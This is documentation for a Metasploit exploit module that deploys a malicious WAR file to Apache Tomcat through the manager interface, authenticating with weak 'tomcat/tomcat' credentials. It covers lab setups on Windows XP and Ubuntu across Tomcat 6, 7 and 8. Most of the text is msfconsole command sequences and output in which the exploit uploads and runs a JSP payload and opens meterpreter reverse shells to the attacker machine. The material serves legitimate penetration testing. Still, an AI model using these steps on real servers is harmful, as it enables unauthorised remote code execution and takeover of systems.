documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens. This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
It should be stated outright that the exploit MAY NOT undeploy the shellcode from Tomcat. This can be done manually.
This module is VERY similar to exploit/multi/http/tomcat_mgr_upload, the main difference is this uses a PUT HTTP request, instead of going through a POST HTTP request through the GUI.
The install was default, other than adding a user during install. No other options were changed. The install assigned the new user the role manager-gui, which is Tomcat 7+ syntax.
For this exploitation, it was changed to simply manager.
Edit C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml to add the following under the <tomcat-users> line:
<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="manager"/>
Restart Tomcat service
Exploit:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > set rport 8086
rport => 8086
msf exploit(tomcat_mgr_deploy) > set path /manager
path => /manager
msf exploit(tomcat_mgr_deploy) > check
[*] 192.168.2.108:8086 The target appears to be vulnerable.
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6071 bytes as scEYoK0.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp...
[*] Undeploying scEYoK0 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
Of note, as of Tomcat 7, the permission role manager has been divided into several sub-roles. Each sub role the user has will change which path variable for exploitation.
The install was default, other than adding a user during install. No other options were changed.
Of note, the user was given manager-gui permissions by default.
Edit C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml to add the following under the <tomcat-users> line:
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
Restart the service
Exploitation:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > check
[*] 192.168.2.108:8087 The target appears to be vulnerable.
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp...
[*] Undeploying Cl6t6gurtwIO59zV3Lt6 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
Of note, as of Tomcat 7, the permission role manager has been divided into several sub-roles. Each sub role the user has will change which path variable for exploitation.
The install was default, other than adding a user during install. No other options were changed.
Of note, the user was given manager-gui permissions by default.
Edit C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml to add the following under the <tomcat-users line:
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
Restart the service
Exploitation:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > exploit
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
[*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
sudo apt-get install tomcat6 tomcat6-adminEdit /etc/tomcat6/tomcat-users.xml to add the following:
<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="manager"/>
Restart Tomcat: sudo service tomcat6 restart
Exploit:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
rhost => 192.168.2.156
msf exploit(tomcat_mgr_deploy) > set rport 8080
rport => 8080
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.156
[*] Undeploying 9bj4IYa66cSpdK ...
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
meterpreter > sysinfo
Computer : Ubuntu14.04
OS : Ubuntu 14.04 (Linux 4.2.0-27-generic)
Architecture : x64
Meterpreter : x86/linux
Of note, as of Tomcat 7, the permission role manager has been divided into several sub-roles. Each sub role the user has will change which path variable for exploitation.
apt-get install tomcat7 tomcat7-adminEdit /etc/tomcat7/tomcat-users.xml to add:
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
Restart Tomcat: sudo service tomcat7 restart
To verify the permissions are all set correctly, browse to http://192.168.2.118:8087/manager/text/deploy, and you should see FAIL - Invalid parameters supplied for command [/deploy] as opposed to 403 Access Denied
Exploit:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > exploit
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp...
[*] Undeploying 9QymzSGGU0H4e ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
Architecture : x64
Meterpreter : x86/linux
Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which path variable for exploitation.
apt-get install tomcat8 tomcat8-adminEdit /etc/tomcat8/tomcat-users.xml to add:
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
Restart tomcat: sudo service tomcat8 restart
To verify the permissions are all set correctly, browse to http://192.168.2.118:8087/manager/text/deploy, and you should see FAIL - Invalid parameters supplied for command [/deploy] as opposed to 403 Access Denied
Exploit:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp...
[*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-59-generic)
Architecture : x64
Meterpreter : x86/linux
Manual cleanup can be done by logging into the /manager website. From there, click Undeploy within the Application list to remove the malicious app from Tomcat.